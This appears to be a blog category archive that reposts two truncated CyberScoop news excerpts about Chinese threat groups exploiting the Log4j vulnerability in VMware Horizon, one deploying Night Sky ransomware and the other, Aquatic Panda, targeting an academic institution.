Category Archives: Aquatic Panda

Suspected Chinese hackers use Log4j flaw to deploy Night Sky ransomware, Microsoft warns

Posted on by

A China-based ransomware operator has been exploiting a vulnerability in Log4j software to attack internet-facing systems running a popular virtualization service, Microsoft analysts reported Monday. The findings point toward attacks on VMWare Horizon, an application that allows remote users access to virtual computers and servers. Successful attacks have led to the deployment of ransomware via a hacking campaign that calls itself Night Sky. The group behind this effort has previously deployed other ransomware strains, including LockFile, AtomSilo, and Rook, the Microsoft researchers reported. This new campaign, which dates back to Jan. 4 — even though the VMWare Horizon exploitation at the hands of the Log4j vulnerability was spotted toward the end of December — relies in part on spoofed domains made to look as though they’re associated with known technology firms such as TrendMicro, Sophos, Nvidia, and Rogers. VMware issued guidance on remediation on Dec. 14, less than a week after […]

The post Suspected Chinese hackers use Log4j flaw to deploy Night Sky ransomware, Microsoft warns appeared first on CyberScoop.

Continue reading Suspected Chinese hackers use Log4j flaw to deploy Night Sky ransomware, Microsoft warns

Chinese hackers use Log4j exploit to go after academic institution

Posted on by

A Chinese hacking group known for industrial espionage and intelligence collection used a vulnerability in Log4j to go after a large academic institution, researchers at CrowdStrike revealed Wednesday. Threat analysts observed the group attempting to install malware after gaining access using a modified version of a Log4j exploit for VMWare Horizon, a virtual workspace technology. CrowdStrike also observed the Chinese hackers trying to harvest credentials for further exploitation. CrowdStrike analysts believe that the group behind the attack, which it is calling “Aquatic Panda,” has likely been active since at least May 2020. Its operations have primarily focused on targets in the telecommunications, technology and government sectors. “Because OverWatch disrupted the attack before AQUATIC PANDA could take action on their objectives, their exact intent is unknown,” Param Singh, vice president of CrowdStrike OverWatch, wrote to CyberScoop in an email. “This adversary, however, is known to use tools to maintain persistence in environments […]

The post Chinese hackers use Log4j exploit to go after academic institution appeared first on CyberScoop.

Continue reading Chinese hackers use Log4j exploit to go after academic institution